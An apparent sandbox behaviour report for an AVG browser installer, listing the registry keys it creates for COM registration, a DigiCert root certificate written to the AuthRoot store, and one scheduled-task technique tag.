description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{633D953B-278A-4DAC-8E4B-D15296A1C845}\VersionIndependentProgID\ = "AVGUpdate.Update3WebSvc" AVGBrowserUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{67F69D86-C3AA-4CBF-A536-C73B5D785FFC}\NumMethods AVGBrowserUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C32E10AE-6600-4A1E-8BEA-EF89A3072F93}\ProxyStubClsid32\ = "{2E7A212B-A33C-45D6-9EFD-2AB58EFAACF0}" AVGBrowserUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{358EC846-617A-4763-8656-50BF6E0E8AA2}\ = "Interface {358EC846-617A-4763-8656-50BF6E0E8AA2}" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AVGUpdate.OnDemandCOMClassSvc\CurVer\ = "AVGUpdate.OnDemandCOMClassSvc.1.0" AVGBrowserUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AVGUpdate.Update3WebSvc.1.0\ = "GoogleUpdate Update3Web" AVGBrowserUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{804EC8ED-BF49-41ED-BCD0-CA1D716D3E98}\ProxyStubClsid32 AVGBrowserUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{925547A3-663F-4673-A7B7-3FCACCDC4879} AVGBrowserUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{41A025DF-6171-460F-B9A1-29ECE33E754E} AVGBrowserUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C8159E37-5EDF-4E6D-8E6D-E558E8DDC2A0}\NumMethods\ = "5" AVGBrowserUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB785069-B832-4423-B813-47F7422BA6E5}\ProxyStubClsid32 AVGBrowserUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\Software\Classes\TypeLib\{358EC846-617A-4763-8656-50BF6E0E8AA2} setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AVGUpdate.CoreClass.1\ = "Google Update Core Class" AVGBrowserUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AVGUpdate.Update3WebMachine.1.0 AVGBrowserUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3A708F91-06A3-409E-83BC-4A5CF10C8025}\ProxyStubClsid32 AVGBrowserUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{59577BB5-F97B-4880-B785-510238C5C5CE}\ = "IApp2" AVGBrowserUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AVGUpdate.MiscUtils.1.0\ = "Google Update Misc Utils Class" AVGBrowserUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8C50E3A4-12A8-41FB-9941-E8EEB222E07E}\ProxyStubClsid32\ = "{2E7A212B-A33C-45D6-9EFD-2AB58EFAACF0}" AVGBrowserUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{D37D106C-CDD2-4821-BC7A-F08990DDCA74}\ = "IGoogleUpdateCore" AVGBrowserUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AVGUpdate.ProcessLauncher.1.0\ = "Google Update Process Launcher Class" AVGBrowserUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AVGUpdate.CredentialDialogMachine.1.0 AVGBrowserUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AVGUpdate.CoreClass.1\CLSID AVGBrowserUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{925547A3-663F-4673-A7B7-3FCACCDC4879}\ = "IAppCommand" AVGBrowserUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3E21E991-301D-47FD-AB7A-99FBE864EF65}\NumMethods AVGBrowserUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B80EC6B9-55FF-4E4F-B4E8-9BD098DBBAA5}\ = "CoCreateAsync" AVGBrowserUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B80EC6B9-55FF-4E4F-B4E8-9BD098DBBAA5}\LocalServer32\ = "\"C:\\Program Files (x86)\\AVG\\Browser\\Update\\1.8.1693.6\\AVGBrowserUpdateBroker.exe\"" AVGBrowserUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{59577BB5-F97B-4880-B785-510238C5C5CE}\ProxyStubClsid32 AVGBrowserUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2DAE1732-F855-42A3-9D28-B7F6E291ECCD}\NumMethods AVGBrowserUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{67F69D86-C3AA-4CBF-A536-C73B5D785FFC}\NumMethods AVGBrowserUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A42B2494-93AE-44E1-B76D-BA8509A5167D}\LocalServer32 AVGBrowserUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6972DB5C-E9D6-4A81-B352-B415A3A61CA6}\ProxyStubClsid32\ = "{2E7A212B-A33C-45D6-9EFD-2AB58EFAACF0}" AVGBrowserUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{40C1C1D3-AAEA-46EE-AA2B-79A2CC62F257} AVGBrowserUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{82C85EAA-7C94-4702-AA75-DF39403AE358}\AppID = "{82C85EAA-7C94-4702-AA75-DF39403AE358}" AVGBrowserUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8C7E81D6-0463-485E-8DF5-2ADAD81FAF40} AVGBrowserUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D37D106C-CDD2-4821-BC7A-F08990DDCA74}\NumMethods\ = "5" AVGBrowserUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{41A025DF-6171-460F-B9A1-29ECE33E754E}\ProxyStubClsid32\ = "{2E7A212B-A33C-45D6-9EFD-2AB58EFAACF0}" AVGBrowserUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B80EC6B9-55FF-4E4F-B4E8-9BD098DBBAA5}\VersionIndependentProgID AVGBrowserUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AvgHTML\Application\ApplicationCompany = "Gen Digital Inc." setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{30612A81-C10F-498E-9163-C2B2A3F81A14}\VersionIndependentProgID AVGBrowserUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8C50E3A4-12A8-41FB-9941-E8EEB222E07E}\ProxyStubClsid32\ = "{2E7A212B-A33C-45D6-9EFD-2AB58EFAACF0}" AVGBrowserUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B02B2F29-8637-4B78-892A-CFD7CCE793EC}\NumMethods\ = "4" AVGBrowserUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7BA03866-1403-40EA-81A9-23FCD97810E2}\NumMethods AVGBrowserUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BAAD654E-4B50-4C9F-A261-CF29CF884478}\VersionIndependentProgID AVGBrowserUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8C50E3A4-12A8-41FB-9941-E8EEB222E07E} AVGBrowserUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{925547A3-663F-4673-A7B7-3FCACCDC4879} AVGBrowserUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AVGUpdate.MiscUtils.1.0\CLSID\ = "{7E22D0ED-B403-44D2-BABF-4DDD0DFCA692}" AVGBrowserUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID AVGBrowserUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{079CAB07-5001-4E71-9D5A-B412842E5178}\NumMethods\ = "41" AVGBrowserUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{67F69D86-C3AA-4CBF-A536-C73B5D785FFC}\NumMethods\ = "6" AVGBrowserUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C0BE1521-7935-42E6-B606-058A559910BA}\ProxyStubClsid32 AVGBrowserUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C9E6B2FC-34C6-435F-BC66-1EA330DB1270}\NumMethods\ = "13" AVGBrowserUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6972DB5C-E9D6-4A81-B352-B415A3A61CA6}\NumMethods AVGBrowserUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E3700FAF-2DC2-4322-99B1-D6A51203AF77}\ProxyStubClsid32 AVGBrowserUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C32E10AE-6600-4A1E-8BEA-EF89A3072F93} AVGBrowserUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2DAE1732-F855-42A3-9D28-B7F6E291ECCD}\ = "IAppCommand2" AVGBrowserUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{41A025DF-6171-460F-B9A1-29ECE33E754E}\ = "IGoogleUpdate3" AVGBrowserUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AVGUpdate.Update3WebMachine AVGBrowserUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0929891C-854C-4BFF-AE54-7EE10636719D}\InprocServer32\ThreadingModel = "Both" AVGBrowserUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID AVGBrowserUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{30612A81-C10F-498E-9163-C2B2A3F81A14}\LocalService = "avgm" AVGBrowserUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{925547A3-663F-4673-A7B7-3FCACCDC4879}\NumMethods\ = "11" AVGBrowserUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{45F7CBA5-258D-4852-AD0A-B18F3FB214F4}\ProxyStubClsid32 AVGBrowserUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\Software\Classes\.xhtml\OpenWithProgids setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{079CAB07-5001-4E71-9D5A-B412842E5178}\ProxyStubClsid32\ = "{2E7A212B-A33C-45D6-9EFD-2AB58EFAACF0}" AVGBrowserUpdate.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 0f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e42000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e19962000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 190000000100000010000000ffac207997bb2cfe865570179ee037b90f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e404000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c00000001000000040000000010000004000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e setup.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
